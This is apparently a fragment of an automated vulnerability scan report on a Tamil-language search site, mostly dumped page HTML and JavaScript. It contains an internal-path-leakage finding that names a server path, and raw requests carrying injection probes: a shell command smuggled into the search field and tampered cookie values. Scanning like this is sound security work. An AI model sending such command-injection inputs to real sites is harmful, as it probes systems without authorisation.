counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft"> </td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright"> </td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft"> </td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="%27" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td> </td><td> </td></tr></table></td><td class="searchtdright"> </td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">553,000,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> </table> </td> </tr><tr><td height="1px" width="70%&qu..
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Error messages should be disabled.
Remove this kind of private data from the output.
External References
- /search/web/Linkbucks%20vlad%20modelS
/home/drpc/public_html/DRPC-net/kdvix
Request
GET /search/web/Linkbucks%20vlad%20modelS HTTP/1.1 Referer: http://kroogy.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:34:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 11414 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - Linkbucks vlad modelS</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - Linkbucks vlad modelS"><meta name="keywords" content="Kroogy Search,search,search engine,Linkbucks vlad modelS,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!--.totaltd { border-bottom:#045c97; border-bottom-style:solid; border-bottom-width:1px; background-color:#e4f2fc; height:20px; padding-left:10px; padding-right:10px; } .typesearchtd { border-bottom:#045c97; border-bottom-style:solid; border-bottom-width:1px; background-color:#e4f2fc; height:20px; padding-left:10px; padding-right:10px; } .conversiontable { width:100%; } .conversiontd { padding-left:10px; padding-right:10px; padding-bottom:20px; } .conversionkeyword { font-size:18px; font-style:italic; } .conversiontarget { font-size:18px; font-style:italic; } .viewmorelinktd { padding-bottom:15px; } .viewmorelink { font-size:12px; } .showimagetd { padding-bottom:5px; } .imagepreviewlinkweb { font-size:12px; } .resultcountstart { font-size:13px; font-weight:bold; } .resultcountend { font-size:13px; font-weight:bold; } .totalresults { font-size:13px; font-weight:bold; } .keywordintotal { font-size:13px; font-weight:bold; } .thumbshotimage { border: 1px solid black; } .outermaincontainer { align:center; width:100%; } .outermainresulttd { vertical-align:top; width:850px; padding:10px; } outermainimageresulttd { vertical-align:top; width:100%; padding:10px; } .totaltable { width:100%; height:30px; padding-left:0px; font-family:Verdana, Arial, Helvetica, sans-serif; } .totaltext { font-size:12px; } .typesearchtext { text-transform: capitalize; font-size:12px; font-weight:bold; } .spelltable { height:30px; width:100%; font-family:Verdana, Arial, Helvetica, sans-serif; padding:20px; } .spellsuggestiontext { padding-left:10px; padding-right:10px; font-size:13px; font-weight:bold; } .spelllink { font-weight:bold; font-size:13px; color:green; } .resultsetwrapper { width:100%; } .resultsetwrappertd { } .resulttable { width:100%; } .thumbshotimage { width:100px; heigth:100px; } .resulttd { width:100%; valign:top; font-family:Verdana, Arial, Helvetica, sans-serif; } .resulttitle { font-size:13px; valign:top; font-family:verdana,Arial, Helvetica, sans-serif; } .resulttitle a:hover { color:red; } .resultlink { } .newwindowimage { width:11px; height:11px; } .resultdescription { font-size:11px; } .resulturl { font-size:12px; color:green; } .emailfrndlink { font-size:12px; } .seperationtd { height:10px; } .footerpagetable { width:100%; } .relatedkeywordstable { width:100%; } .footerpagetd a { text-decoration:none; font-size:14px; color:#0368ab; border-style:solid; border-width:1px; border-color:#a4d7fa; padding-left:8px; padding-right:8px; padding-top:2px; padding-bottom:2px; font-family:Arial, Helvetica, sans-serif; } .footerpagetd a:hover { text-decoration:none; font-size:14px; color:#fff; border-style:solid; border-width:1px; border-color:#a4d7fa; padding-left:8px; padding-right:8px; padding-top:2px; padding-bottom:2px; background-color:#0368ab; } .footerpagetext { font-size:15px; color:black; font-weight:bold; } .footerpagetd { padding:10px; height:40px; } .relatedkeywordstd { height:40px; padding-left:10px; padding-right:10px; font-family:Verdana, Arial, Helvetica, sans-serif; } .relatedkeywordmessage { font-size:12px; font-weight:bold; } .relatedkeywordlink { font-size:12px; font-weight:bold; } .imagedomain { font-size:10px; color:green; line-height:15px; } .imagedetails { font-size:10px; line-height:15px; font } .imagetitle { font-size:11px; line-height:25px; } .imagepreview { font-size:11px; } .imageresulttd { padding-left:10px; padding-bottom:15px; padding-right:10px; font-family:Verdana; } .videoresulttd { padding-bottom:15px; padding-left:10px; padding-right:10px; font-family:Verdana; } .videotitle { font-size:11px; line-height:20px; font-weight:bold; } .videoduration { font-size:10px; color:green; line-height:15px; } .videopublishedon { font-size:10px; line-height:15px; } .thumbshottd { padding-bottom:5px; padding-right:10px; vertical-align:top; padding-left:10px; } .imageresultsinwebtd { padding-left:10px; vertical-align:bottom; } .imageresultinweb { border: 1px solid black; max-height:80px; } .imageresultinwebviewmorelink { font-size:12px; font-weight:bold; } .arithmeticconversiontd { padding-left:10px; padding-right:10px; padding-top:10px; font-size:14px; font-weight:bold; } .qlook { font-size:12px; } .emaillinkimage { width:12px; height:12px; } .arithmeticconversionkeyword { font-size:16px; font-weight:bold; } .arithmeticcoversionresult { font-size:16px; font-weight:bold; } .noresulttext { font-size:12px; font-weight:bold; } .noresulttd { padding-top:15px; padding-left:15px; align-text:center; padding-right:15px; } .quicklooktd { padding-left:10px; } .imageresultinwebviewmorelinktd { padding-bottom:15px; padding-left:10px; padding-right:10px; } .outermainadtd { padding-top:20px; padding-left:10px; padding-right:10px; vertical-align:top; } .amazonnavigationoptiontext { font-size:12px; font-weight:bold; } .amazoncountrytd { padding-top:10px; } .amazoncategorytd { padding-top:10px; } .ebaythumbshotimage { border: 1px solid black; width:80px; } .amazonthumbshotimage { width:55px; border: 1px solid black; } .box { background-color: #F0F8FF; } .border { border-left-color: #d3e1f9; border-right-color: #d3e1f9; }/* CSS Document */ .body td, tr { font-family:Verdana, Arial, Helvetica, sans-serif; } #countries,#optionallanguage,#themegroup { background-color:#e4f2fc; height:22px; border-width:1px; border-style:solid; Border-color:#aaaaaa; } .advancedsearchsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .advancedsearchtexttd { width:250px; padding-left:5px; height:40px; padding-right:5px; } .advancedsearchfieldtd { padding-bottom:15px; } .advancedsearchtextstyle { font-size:12px; } .advancedsearchtable { width:700px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .advancedsearchexampletext { font-size:12px; } .advancedsearchtitletable { width:700px; margin-top:20px; background-color:#e1e1e1; padding-top:15px; padding-bottom:15px; } .advancedsearchtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .advancedsearchsubtitletext { font-size:12px; font-weight:bold; } .footertable { width:100%; padding-top:15px; } .footertext { font-size:12px; } .footertd { padding-left:10px; } .headerlinkstd { width:100%; padding-right:5px; padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; } .headerlinkstd a ,.headerlinkstd a:visited { color:#000000; font-weight:bold; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; } .languagetd { padding-left:5px; font-size:12px; height:30px; } .headerlink { font-size:12px; } .themetd { padding-left:5px; padding-top:2px; font-size:13px; padding-bottom:2px; border-bottom:#045c97; background-color: #e4f2fc; border-bottom-style: solid; border-bottom-width: 1px; color:#000; } .cloudtagtd { margin-top:20px; padding-top:5px; padding-left:5px; border-color:#77c3fa; border-width:1px; border-style:solid; padding-bottom:5px; padding-left:5px; padding-right:5px; } .cloudtagtd a { font-family:Verdana, Arial, Helvetica, sans-serif; } .generallinks { font-size:12px; } .opendirectorytd { padding-top:10px; } .advancetd { height:20px; padding-left:5px; font-size:13px; } .footerlinktd { height:15px; border-top: #045c97; padding-top:5px; border-top-style: solid; border-top-width: 1px; } .stdpagetitle { font-size:14px; font-weight:bold; } .emailafrndurltd , .emaillinkdesctd { padding-top;5px; background-color:#e4f2fc; padding-bottom:5px; } .emailafrndurl { font-size:12px; font-weight:bold; } .outermainoptionstd { padding-left:15px; padding-right:15px; padding-top:5px; padding-bottom:5px; font-size:12px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermainlogotd { width:5%; padding-top:5px; padding-bottom:5px; padding-left:15px; padding-right:15px; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } .outermaintabtd { padding-top:10px; padding-bottom:5px; padding-left:0px; padding-right:0px; vertical-align:bottom; background: url(images/themes/modern_blue/box.gif); background-position:bottom; background-repeat:repeat-x; } #mandatory { color:red; font-size:10px; font-weight:bold; vertical-align:top; padding-left:2px; padding-right:2px; } #morelanguagesdiv { font-size:11px; } .advancetd a { font-size:11px; } .generatesearchboxtable { width:900px; margin-top:10px; padding-top:5px; padding-bottom:15px; } .generatesearchboxtitletd { padding-left:5px; height:30px; text-align:center; background-color:#e4f2fc; width:100%; border:#045c97; border-style: solid; border-width: 1px; } .generatesearchboxpagetitle { font-size:14px; font-weight:bold; } .generatesearchboxtexttd { padding-left:5px; height:40px; padding-right:5px; } .generatesearchboxtextstyle { font-size:12px; } .generatesearchboxsubtitletd { padding-bottom:15px; padding-top:10px; padding-left:5px; padding-right:5px; } .generatesearchboxsubtitletext { font-size:12px; font-weight:bold; } .generatesearchboxenginestextstyle { font-size:12px; text-transform: capitalize; } -->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementByI..
/etc/relsov.conf
Request
GET /search/web?search=%27%26+ping+-n+26+127.0.0.1+%26&type=web&fl=0 HTTP/1.1 Referer: http://kroogy.com/search/redir User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:05:46 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 9129 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - '& ping -n 26 127.0.0.1 &</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - '& ping -n 26 127.0.0.1 &"><meta name="keywords" content="Kroogy Search,search,search engine,'& ping -n 26 127.0.0.1 &,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft"> </td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" 